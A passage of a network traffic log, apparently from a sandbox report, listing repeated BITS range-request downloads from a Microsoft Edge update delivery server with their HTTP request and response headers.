                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2466668-2601459
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:44 GMT
                Content-Type: application/octet-stream
                Content-Length: 134792
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c884de7-2915334016-36
                Ocn-Served-By: QLT
                Content-Range: bytes 2466668-2601459/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2601460-2778558
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:45 GMT
                Content-Type: application/octet-stream
                Content-Length: 177099
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c886b7f-2915334016-37
                Ocn-Served-By: QLT
                Content-Range: bytes 2601460-2778558/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=2778559-3116072
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:47 GMT
                Content-Type: application/octet-stream
                Content-Length: 337514
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c888bdb-2915334016-38
                Ocn-Served-By: QLT
                Content-Range: bytes 2778559-3116072/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=3116073-3578565
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:48 GMT
                Content-Type: application/octet-stream
                Content-Length: 462493
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c88a74c-2915334016-39
                Ocn-Served-By: QLT
                Content-Range: bytes 3116073-3578565/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=3578566-4002715
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:49 GMT
                Content-Type: application/octet-stream
                Content-Length: 424150
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c88d567-2915334016-40
                Ocn-Served-By: QLT
                Content-Range: bytes 3578566-4002715/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4002716-4163045
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:51 GMT
                Content-Type: application/octet-stream
                Content-Length: 160330
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c890043-2915334016-41
                Ocn-Served-By: QLT
                Content-Range: bytes 4002716-4163045/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4163046-4190395
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:53 GMT
                Content-Type: application/octet-stream
                Content-Length: 27350
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c893a86-2915334016-42
                Ocn-Served-By: QLT
                Content-Range: bytes 4163046-4190395/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4190396-4316913
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:55 GMT
                Content-Type: application/octet-stream
                Content-Length: 126518
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c897f47-2915334016-43
                Ocn-Served-By: QLT
                Content-Range: bytes 4190396-4316913/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4316914-4742345
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:57 GMT
                Content-Type: application/octet-stream
                Content-Length: 425432
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c89ce42-2915334016-44
                Ocn-Served-By: QLT
                Content-Range: bytes 4316914-4742345/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4742346-4811945
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:58 GMT
                Content-Type: application/octet-stream
                Content-Length: 69600
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c89db3f-2915334016-45
                Ocn-Served-By: QLT
                Content-Range: bytes 4742346-4811945/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=4811946-5735550
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:02 GMT
                Content-Type: application/octet-stream
                Content-Length: 923605
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8a46d8-2915334016-46
                Ocn-Served-By: QLT
                Content-Range: bytes 4811946-5735550/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=5735551-6185476
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:03 GMT
                Content-Type: application/octet-stream
                Content-Length: 449926
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8a6160-2915334016-47
                Ocn-Served-By: QLT
                Content-Range: bytes 5735551-6185476/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=6185477-6539224
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:49:04 GMT
                Content-Type: application/octet-stream
                Content-Length: 353748
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8a7eec-2915334016-48
                Ocn-Served-By: QLT
                Content-Range: bytes 6185477-6539224/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=6539225-6880545
